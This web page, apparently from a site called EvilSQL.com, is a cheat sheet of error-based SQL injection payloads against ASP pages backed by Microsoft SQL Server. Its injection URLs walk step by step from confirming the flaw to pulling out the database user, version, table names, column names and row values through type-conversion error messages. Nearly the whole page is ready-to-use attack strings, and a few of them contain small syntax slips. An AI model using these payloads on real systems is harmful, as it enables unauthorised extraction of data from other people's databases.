Syler.Grey[at]gmail.com
| ERROR SQL INJECTION - DETECTION | |
Integer Injection: http://[site]/page.asp?id=1 having 1=1-- Column '[COLUMN
NAME]' is invalid in the select list because it is not contained
in an aggregate function and there is no GROUP BY clause. Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
|
|
| ERROR SQL INJECTION - EXTRACT DATABASE USER | |
| http://[site]/page.asp?id=1 or 1=convert(int,(USER))-- Syntax error converting the
nvarchar value '[DB USER]' to a column of
data type int. |
|
| ERROR SQL INJECTION - EXTRACT DATABASE NAME | |
| http://[site]/page.asp?id=1 or 1=convert(int,(DB_NAME))-- Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT DATABASE VERSION | |
| http://[site]/page.asp?id=1 or 1=convert(int,(@@VERSION))-- Syntax error converting the nvarchar value '[DB VERSION]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT SERVER NAME | |
| http://[site]/page.asp?id=1 or 1=convert(int,(@@SERVERNAME))-- Syntax error converting the nvarchar value '[SERVER NAME]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT 1st DATABASE TABLE | |
| http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))-- Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE | |
| http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>'TABLE-NAME-1'))-- Syntax error converting the nvarchar value '[TABLE NAME 2]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE | |
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>'TABLE-NAME-2'))-- Syntax error converting the nvarchar value '[TABLE NAME 3]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME | |
http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))-- Syntax error converting the nvarchar value '[COLUMN NAME 1]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME | |
| http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-1'))-- Syntax error converting the nvarchar value '[COLUMN NAME 2]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME | |
| http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-2'))-- Syntax error converting the nvarchar value '[COLUMN NAME 3]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW | |
| http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))-- Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW | |
| http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-2 from TABLE-NAME-1))-- Syntax error converting the nvarchar value '[FIELD 2 VALUE]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT 3nd FIELD OF 1st ROW | |
| http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-3 from TABLE-NAME-1))-- Syntax error converting the nvarchar value '[FIELD 3 VALUE]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW | |
| http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))-- Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 2ND ROW]' to a column of data type int.
|
|
| ERROR SQL INJECTION - EXTRACT 1st FIELD OF 3nd ROW | |
| http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-2-VALUE') order by COLUMN-NAME-1 desc))-- Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 3RD ROW]' to a column of data type int.
|
|
|
This website is available for your personal use and viewing. Access and use by you of this site constitutes acceptance by you of these Terms and Conditions that take effect from the date of first use. You agree to use this website only for lawful purposes, and in a manner that does not infringe the rights of, or restrict or inhibit the use and enjoyment of this site by any other third party. EvilSQL.com shall have no liability to any person for the accuracy or contents of the security advice published on this website. EvilSQL.com assumes no responsibility to any person. No warranties are given. No liability is accepted for any inclusion or omission herefrom or the absence of any other information or matter. Furthermore, no liability or responsibility is accepted for any further advice given or omission to give further advice, prior to or subsequent to the advice published on this website. |